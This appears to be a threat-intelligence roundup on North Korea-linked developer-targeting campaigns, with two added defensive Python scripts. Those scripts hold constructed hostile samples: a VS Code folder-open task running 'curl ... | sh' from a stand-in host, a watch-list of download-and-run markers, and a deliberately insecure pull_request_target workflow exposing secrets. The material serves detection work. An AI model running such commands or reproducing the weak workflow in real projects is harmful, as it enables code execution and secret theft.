North Korea-linked Social Engineering Campaigns Targeting Developers and Defense Supply Chains
North Korea–aligned operators, including Lazarus (aka HIDDEN COBRA), are running multiple social-engineering-led intrusion campaigns aimed at stealing sensitive technology and establishing durable access. Reporting on Operation DreamJob describes fake job-offer lures used to compromise European drone manufacturers and defense contractors, with tooling and infrastructure designed to evade traditional defenses and support cyber-espionage against UAV-related intellectual property. Separately, a developer-focused operation dubbed “Fake Font” uses fake recruiter outreach and malicious GitHub repositories to trick engineers into opening projects that abuse Visual Studio Code automation (via .vscode/tasks.json) and disguised payloads (e.g., .woff2 “font” files) to execute multi-stage malware that ultimately deploys the InvisibleFerret Python backdoor for credential and crypto-wallet theft and long-term access.
A distinct DPRK-linked campaign reported by Darktrace targets South Korean users with spear-phishing that delivers a JSE script masquerading as an HWPX document and then abuses VS Code tunnels as a covert C2 channel over trusted Microsoft infrastructure, complicating detection in developer-heavy environments. Other items in the set describe unrelated activity: phishing abuse of Vercel to deliver remote-access tooling, exploitation of CVE-2025-51683 (blind SQLi) in the Mjobtime time-tracking app to reach MSSQL xp_cmdshell, a hospitality-focused DCRat campaign using ClickFix and MSBuild.exe, a generic CSS exfiltration technique write-up, and Trend Micro research on the PeckBirdy LOLBins framework used by China-aligned intrusion sets—none of which are part of the DPRK developer/defense recruitment-themed operations above.
Related Stories

North Korean Contagious Interview Campaign Uses Malicious VS Code Projects
North Korea-linked threat actors tied to the long-running **Contagious Interview** operation have been observed using **malicious Microsoft Visual Studio Code (VS Code) projects** as part of fake job-assessment lures, instructing targets to clone repositories from GitHub/GitLab/Bitbucket and open them in VS Code. The technique abuses VS Code `tasks.json` configuration—specifically `"runOn": "folderOpen"`—to trigger execution when a folder is opened, pulling staged payloads from attacker-controlled infrastructure (including Vercel-hosted domains) and ultimately deploying backdoors such as **BeaverTail** and **InvisibleFerret** that enable remote code execution and follow-on control. Recent iterations reportedly add multi-stage droppers embedded in task configuration content and disguised as benign files (e.g., spell-check dictionaries) to improve resilience if network retrieval fails, and include command-and-control behavior that can execute attacker-supplied JavaScript from a remote server (e.g., `ip-regions-check.vercel[.]app`). Separate reporting on North Korean APT trends indicates continued reliance on **fraudulent IT employment schemes** and recruitment-platform abuse to gain access to Western organizations, including long-term social engineering and persistent remote access via legitimate tools (e.g., *AnyDesk*, *Google Remote Desktop*) and VPN/location obfuscation. This broader pattern aligns with the same overarching tradecraft used in developer-targeted “interview” lures: leveraging hiring workflows and developer tooling to establish initial access and persistence while reducing suspicion, particularly in environments with remote-work infrastructure and developer workstations.
1 month ago
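The folder-open trigger described above lives under a task's `runOptions` in `.vscode/tasks.json`. The following audit script is an added example, not code from the reporting or from any of the campaigns it covers; the sample `tasks.json`, the `example.invalid` URL and the watch-list of command markers are constructed for illustration.

```python
"""Flag VS Code tasks that run automatically when a folder is opened.
Added example, not code from the reporting above: VS Code starts a task on
workspace open when its runOptions carry "runOn": "folderOpen", the hook the
Contagious Interview lures abuse. This parses .vscode/tasks.json (tolerating
the comments and trailing commas VS Code allows) and lists such tasks.
"""
import json
import re
from pathlib import Path
# Constructed tasks.json, not a real lure; the second task is the pattern.
SAMPLE_TASKS_JSON = """{
    // build task a developer would expect
    "version": "2.0.0",
    "tasks": [
        { "label": "build", "type": "shell", "command": "npm run build", },
        {
            "label": "Check fonts",
            "type": "shell",
            "command": "curl -s https://example.invalid/fonts.woff2 | sh",
            "runOptions": { "runOn": "folderOpen" },
        }
    ]
}"""

# Constructed watch-list of download-and-run markers, not an IoC feed.
SUSPICIOUS = ("curl", "wget", "powershell", "invoke-", "node -e",
              "python -c", "base64", "| sh", "| bash")
def load_jsonc(text: str) -> dict:
    """Parse VS Code's comment-tolerant JSON (JSONC)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)   # block comments
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)   # line comments
    text = re.sub(r",\s*([}\]])", r"\1", text)          # trailing commas
    return json.loads(text)

def auto_run_tasks(config: dict) -> list[dict]:
    """Return every task VS Code would launch on folder open."""
    hits = []
    for task in config.get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        hits.append({"label": task.get("label", "<unnamed>"), "command": cmd,
                     "suspicious": any(m in cmd.lower() for m in SUSPICIOUS)})
    return hits

def scan_checkout(root: str) -> list[dict]:
    """Audit every .vscode/tasks.json under a cloned repository."""
    return [{"file": str(p), **h} for p in Path(root).rglob("tasks.json")
            if p.parent.name == ".vscode"
            for h in auto_run_tasks(load_jsonc(p.read_text(encoding="utf-8")))]
```

Run `scan_checkout` over a cloned "coding test" before opening it in VS Code; Workspace Trust and the `task.allowAutomaticTasks` setting (set to `off`) prevent such tasks from firing in the first place, so the scan is for triage of repositories that were already cloned.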
North Korea-Linked Threat Activity and Reporting on Lazarus, IT Worker Schemes, and Related Malware
Multiple reports and threat-intel posts highlighted **North Korea-linked cyber activity** spanning social engineering, malware, and broader ecosystem analysis. AllSecure described an attempted compromise of a CEO via a **fake LinkedIn job interview** attributed to **Lazarus** tradecraft (tagged *BeaverTail* / *Contagious Interview*), indicating continued use of recruiter-style lures and developer tooling themes (e.g., *VSCode*) to gain execution on target systems. Separately, eSentire published technical analysis on the **DEV#POPPER remote access trojan** and associated **OmniStealer** activity, framing it as DPRK-linked malware and providing defensive guidance for organizations facing this threat class. Additional DPRK-focused intelligence covered both strategic and operational dimensions. Google’s *Cloud Threat Horizons Report H1 2026* discussed cloud-focused threat activity and tracked DPRK-linked clusters (including **UNC4899** and **UNC5267**), while Logpresso published an OSINT report on **DPRK remote IT worker** infiltration tactics (fraudulent employment/contractor placement). NKInternet released a catalog-style overview of **North Korea’s software export ecosystem**, and RedAsgard’s “Hunting Lazarus” series contributed hands-on investigative detail into Lazarus operator artifacts. A separate Lazarus threat-actor profile page aggregated historical reporting and statistics, but did not add a discrete new incident beyond compilation.
4 days ago
North Korean Contagious Interview Campaign Targets Developers With Fake Recruiting Lures
Reporting describes **North Korea–linked “Contagious Interview” activity** in which attackers pose as recruiters and use fake job processes to compromise software developers. The operation uses deceptive LinkedIn personas and malicious “coding test” repositories to deliver malware (including **BeaverTail** and follow-on multi-platform backdoors/RATs), creating downstream **supply-chain risk** when victims run the code on corporate devices with privileged access. Separately, a real-world example of the same broader tactic was highlighted when an AI security firm’s CEO reported a **deepfake job applicant** and other red flags during a hiring process, reinforcing that adversaries are operationalizing identity fraud and synthetic media to increase the success rate of developer-focused intrusion attempts. The developer ecosystem continues to be a high-value target for initial access and credential theft, as shown by a separate incident in which a **malicious Open VSX extension** masquerading as an Angular language tool reached thousands of downloads and was reported to steal **GitHub/NPM credentials**, browser tokens, and crypto-wallet data while using resilient C2 techniques. In parallel, a high-severity CI/CD weakness was disclosed in the *Eclipse Theia* website repository (**CVE-2026-1699**), where a `pull_request_target` GitHub Actions workflow could allow untrusted PR code execution with access to repository secrets and broad `GITHUB_TOKEN` permissions—conditions that could enable package publishing, website tampering, or code pushes if exploited. Together, the activity underscores elevated risk around **developer hiring workflows, developer tooling marketplaces, and CI pipelines** as converging attack surfaces for credential theft and supply-chain compromise.
1 month ago
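The `pull_request_target` condition noted for CVE-2026-1699 is easy to triage across a repository's workflows. The script below is an added example and is not the Eclipse Theia workflow or any code from the advisory; both workflow texts are constructed samples, with the hardened form using the `pull_request` trigger (no secrets, read-only token) and an explicit `permissions` block.

```python
"""Triage GitHub Actions workflows for the pull_request_target pattern.
Added example, not from the Eclipse Theia advisory: pull_request_target runs with
the base repo's secrets and a write-capable GITHUB_TOKEN, so a workflow that also
checks out and runs the PR head hands those privileges to any outside contributor.
"""
import re

WEAK_WORKFLOW = """\
# constructed sample, not the Theia workflow
name: preview
on: pull_request_target
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm run build
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

HARDENED_WORKFLOW = """\
# constructed sample: untrusted code runs under pull_request (no secrets,
# read-only token) and the token scope is explicit
name: preview
on: pull_request
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm run build
"""

def audit_workflow(text: str) -> dict:
    """Return the indicators found in one workflow file's text."""
    prt = re.search(r"\bpull_request_target\b", text) is not None
    pr_head = re.search(r"github\.event\.pull_request\.head\.(sha|ref)", text) is not None
    return {
        "pull_request_target": prt,
        "checks_out_pr_head": pr_head,
        "uses_secrets": re.search(r"\$\{\{\s*secrets\.", text) is not None,
        "scoped_token": re.search(r"^permissions:", text, re.M) is not None,
        # the combination that turns an outside PR into privileged execution
        "privileged_untrusted_code": prt and pr_head,
    }
```

The regexes are a triage heuristic, not a YAML parser: a flagged file still needs a reviewer to confirm that the checked-out PR code is actually executed in a step.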